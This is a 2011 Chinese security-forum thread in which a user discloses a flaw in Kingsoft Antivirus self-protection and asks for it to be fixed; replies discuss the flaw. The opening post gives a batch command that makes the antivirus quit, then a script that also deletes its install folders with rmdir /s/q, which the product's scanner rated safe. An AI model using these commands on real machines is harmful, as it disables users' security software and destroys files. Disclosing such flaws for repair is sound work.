❤❤❤又是一条指令秒了金山的自保,而且秒得如此干净,希望快点修复

显示全部楼层 · 发表于 2011-3-19 16:56:41

本帖最后由李白vs苏轼于 2011-3-19 19:57 编辑

一直在想,既然金山的卸载程序能卸载金山

肯定是有方法关掉自保咯
于是从卸载程序下手

提取卸载程序在%temp%下产生的文件
在通过au.exe在金山沙箱中跑
分析后终于发现一条指令调用了setupwiz.exe这个程序
运行后发现参数不对,于是试了最常用的-u指令,直接命中,

于是,批处理如下

"C:\Program Files\Common Files\Kingsoft\kiscommon\setupwiz.exe" -u

复制代码

c为安装盘符,运行后金山会自动退出
这个是程序的逻辑问题,并不涉及自保啊防御啊这些

另外该批处理因没涉及危险代码在云端鉴定为安全

退出后金山毒霸要怎么删都可以了 ,因为没自保了

另外在这个过程中,发现了毒霸对bat文件实在太不给力了

99s鉴定器鉴定下面这段为安全,

"C:\Program Files\Common Files\Kingsoft\kiscommon\setupwiz.exe" -u
pause
rmdir /s/q "C:\Program Files\Common Files\Kingsoft\kiscommon"
pause
rmdir /s/q "C:\Program Files\Kingsoft\Kingsoft Antivirus"

复制代码

这个主题应该适合讨论吧,毕竟费的是开虚拟机的电,另外问一下大家,在卡饭发帖,同一个表情怎么用四次呢,知道的告诉我哦

显示全部楼层 · 发表于 2011-3-19 16:57:40

本帖最后由ＳЁv⑦ēЙ 于 2011-3-19 17:01 编辑

前排有人气。

估计SP7真要难产了。

显示全部楼层 · 发表于 2011-3-19 17:00:55

本帖最后由 byxxdrls 于 2011-3-19 17:08 编辑

果然如此，这个漏洞还是必需修补的。

显示全部楼层 · 发表于 2011-3-19 17:03:06

DB，看来金山的SP6还是有值得改进的地方的

显示全部楼层 · 发表于 2011-3-19 17:04:12

回复 4楼猪头无双的帖子

sp7照过

显示全部楼层 · 发表于 2011-3-19 17:14:37

不行啊

显示全部楼层 · 发表于 2011-3-19 17:15:53

这个程序貌似是金山毒霸服务组件的注册程序，用于自我修复，但是就这样被悲剧的利用···主防都不管管·····

显示全部楼层 · 发表于 2011-3-19 17:17:37

这么简单就被攻破了

显示全部楼层 · 发表于 2011-3-19 17:17:47

回复 6楼 y6563536t6 的帖子

不可以请截图

显示全部楼层 · 发表于 2011-3-19 17:18:47

回复 7楼 jyc19970330 的帖子

是的

[金山] ❤❤❤又是一条指令秒了金山的自保,而且秒得如此干净,希望快点修复

本帖子中包含更多资源

评分

评分